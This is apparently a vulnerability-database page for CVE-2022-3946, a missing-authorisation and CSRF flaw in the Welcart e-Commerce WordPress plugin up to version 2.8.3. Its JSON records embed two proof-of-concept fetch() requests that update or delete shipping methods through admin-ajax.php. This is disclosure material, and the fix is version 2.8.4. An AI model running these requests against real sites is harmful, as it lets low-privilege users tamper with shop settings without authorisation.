Description
Auth. Arbitrary Shipping Method Creation/Update/Deletion vulnerability discovered by Lana Codes in WordPress Welcart e-Commerce plugin (versions <= 2.8.3).
## Solution
Update the WordPress Welcart e-Commerce plugin to the latest available version (at least 2.8.4).
Affected Software
Related
{"id": "PATCHSTACK:A9E63888B975B98FC8011A47D36965DB", "vendorId": null, "type": "patchstack", "bulletinFamily": "software", "title": "WordPress Welcart e-Commerce plugin <= 2.8.3 - Auth. Arbitrary Shipping Method Creation/Update/Deletion vulnerability", "description": "Auth. Arbitrary Shipping Method Creation/Update/Deletion vulnerability discovered by Lana Codes in WordPress Welcart e-Commerce plugin (versions <= 2.8.3).\n\n## Solution\n\n\r\n Update the WordPress Welcart e-Commerce plugin to the latest available version (at least 2.8.4).\r\n ", "published": "2022-11-21T00:00:00", "modified": "2022-11-21T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://patchstack.com/database/vulnerability/usc-e-shop/wordpress-welcart-e-commerce-plugin-2-8-3-auth-arbitrary-shipping-method-creation-update-deletion-vulnerability", "reporter": "Lana Codes", "references": ["https://wpscan.com/vulnerability/b48e4e1d-e682-4b16-81dc-2feee78d7ed0"], "cvelist": ["CVE-2022-3946"], "immutableFields": [], "lastseen": "2022-11-24T14:39:55", "viewCount": 1, "enchantments": {"score": {"value": 2.8, "vector": "NONE"}, "affected_software": {"major_version": [{"name": "welcart e-commerce", "version": 2}]}, "vulnersScore": 2.8}, "_state": {"score": 1669301307, "dependencies": 1669301316, "affected_software_major_version": 1669305076}, "_internal": {"score_hash": "a304b21b3f251a247d18a6e50aedf2e1"}, "affectedSoftware": [{"version": "2.8.3", "operator": "le", "name": "welcart e-commerce"}], "vendor_cvss": {"score": "3.1", "severity": "Medium severity"}, "owasp": "A5: Broken Access Control", "classification": "Other Vulnerability Type"}
{"wpvulndb": [{"lastseen": "2022-12-15T02:35:31", "description": "The plugin does not have authorisation and CSRF in an AJAX action, allowing any logged-in user to create, update and delete shipping methods.\n\n### PoC\n\nwp_ajax_shop_options_ajax hook calls shop_options_ajax() function without nonce and without access control update shipping method name (#0 shipping method id) exploit: fetch('http://localhost/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=shop_options_ajax&mode;=update_delivery_method&name;=UPDATE&id;=0&time;=&charge;=-1&days;=-1&nocod;=0&intl;=0&cool;_category=0' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); The exploit requires at least a subscriber role. \\--- delete shipping method (#0 shipping method id) exploit: fetch('http://localhost/wp-admin/admin-ajax.php', { method: 'POST', headers: new Headers({ 'Content-Type': 'application/x-www-form-urlencoded', }), body: 'action=shop_options_ajax&mode;=delete_delivery_method&id;=0' }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); The exploit requires at least a subscriber role.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-11-21T00:00:00", "type": "wpvulndb", "title": "Welcart e-Commerce < 2.8.4 - Subscriber+ Arbitrary Shipping Method Creation/Update/Deletion", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2022-3946"], "modified": "2022-11-21T08:07:50", "id": "WPVDB-ID:B48E4E1D-E682-4B16-81DC-2FEEE78D7ED0", "href": "https://wpscan.com/vulnerability/b48e4e1d-e682-4b16-81dc-2feee78d7ed0", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2022-12-14T23:22:56", "description": "The Welcart e-Commerce WordPress plugin before 2.8.4 does not have authorisation and CSRF in an AJAX action, allowing any logged-in user to create, update and delete shipping methods.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-12-12T18:15:00", "type": "cve", "title": "CVE-2022-3946", "cwe": ["CWE-352", "CWE-862"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-3946"], "modified": "2022-12-14T21:35:00", "cpe": [], "id": "CVE-2022-3946", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-3946", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "wpexploit": [{"lastseen": "2022-12-15T02:35:31", "description": "The plugin does not have authorisation and CSRF in an AJAX action, allowing any logged-in user to create, update and delete shipping methods.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-11-21T00:00:00", "type": "wpexploit", "title": "Welcart e-Commerce < 2.8.4 - Subscriber+ Arbitrary Shipping Method Creation/Update/Deletion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-3946"], "modified": "2022-11-21T08:07:50", "id": "WPEX-ID:B48E4E1D-E682-4B16-81DC-2FEEE78D7ED0", "href": "", "sourceData": "wp_ajax_shop_options_ajax hook calls shop_options_ajax() function without nonce and without access control\r\n\r\nupdate shipping method name (#0 shipping method id) exploit:\r\n\r\nfetch('http://localhost/wp-admin/admin-ajax.php', {\r\n method: 'POST',\r\n headers: new Headers({\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n }),\r\n body: 'action=shop_options_ajax&mode=update_delivery_method&name=UPDATE&id=0&time=&charge=-1&days=-1&nocod=0&intl=0&cool_category=0'\r\n }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));\r\n\r\nThe exploit requires at least a subscriber role.\r\n\r\n---\r\n\r\ndelete shipping method (#0 shipping method id) exploit:\r\n\r\nfetch('http://localhost/wp-admin/admin-ajax.php', {\r\n method: 'POST',\r\n headers: new Headers({\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n }),\r\n body: 'action=shop_options_ajax&mode=delete_delivery_method&id=0'\r\n }).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error));\r\n\r\nThe exploit requires at least a subscriber role.", "cvss": {"score": 0.0, "vector": "NONE"}}]}
WordPress Welcart e-Commerce plugin <= 2.8.3 - Auth. Arbitrary Shipping Method Creation/Update/Deletion vulnerability
